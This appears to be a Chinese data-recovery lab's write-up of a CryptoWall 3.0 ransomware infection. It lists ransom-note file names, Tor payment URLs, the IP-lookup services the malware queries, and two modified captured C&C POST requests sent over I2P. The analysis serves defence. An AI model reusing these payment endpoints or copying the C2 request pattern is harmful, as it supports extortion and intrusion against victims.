INTOHARD数据恢复实验室遇到了一例特别的数据加密勒索——它使用I2P匿名网络进行通信,名为Cryptowall 3.0,客户硬盘内所有的Office文档(Word/Excel)被加密勒索病毒加密,硬盘用户需要恢复被加密的Office文档数据: What happened to your files ? All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0. 通过数据及表现证实为Cryptowall 3.0,通过硬盘的用户描述,可能是在邮件附件中捆绑了Cryptowall 3.0导致感染,它以附档的方式,透过邮件散播,诱使不留心者解开附件文档,然后很快你就会看到令人冷汗直冒的「红色死亡画面」。画面出现时,表示电脑中所有的档案已经以公开金钥架构(Public-key Infrastructure,PKI)的公钥全数加密完成,没有私钥便无法解开。我们找到了Cryptowall 的一些相关信息: 一天感染288个用户 来自法国的安全研究员Kafeine在其博客中确认了这款软件使用I2P匿名网络进行C&C通讯,在@Horgh_RCE的反编译下为我们揭开了Cryptowall 3.0的面纱。 微软提供的数据显示从1月11日至1月12日一天时间里,Cryptowall感染了288个用户。 HELP_DECRYPT.HTML HELP_DECRYPT.PNG HELP_DECRYPT.TXT HELP_DECRYPT.URL 只要有Office文档的地方就多了4个这样命名的文件,相较之前的变种,软件在用于勒索的提示文件的文件名上有少许变化: 该款勒索软件十分贴心,HELP_DECRYPT.PNG语言版本是根据用户的IP决定的,如法国安全研究员Kafeine的HELP_DECRYPT.PNG: 针对不同的用户,文中的链接也各不相同。以下是Kafeine提供的一组链接: http://paytoc4gtpn5czl2.torforall.com/1c3L59z http://paytoc4gtpn5czl2.torman2.com/1c3L59z http://paytoc4gtpn5czl2.torwoman.com/1c3L59z http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z 软件完成对用户文件的加密后会提示用户使用比特币支付赎金。自CoinVault之后,免费解密一个文件似乎要变成行业标准了,CryptoWall 3.0也附带了这一功能: 软件使用以下服务获取IP: "http://ip-addr.es" "http://myexternalip.com/raw" "http://curlmyip.com" I2P协议传输 与C&C服务器的通讯似乎是通过Rc4加密了,并且数据通过i2p协议传输: --------------数据稍经修改-------
POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy2-2-2.i2p
v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c ---------------数据稍经修改-------
POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy1-1-1.i2p
z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626
-------------------------------------------------- 经过解密后的数据:(不要尝试解密前面的数据,我们故意修改了有些十六进制数) 参考来源Malware don't need Coffee & TechNet,译/Sphinx |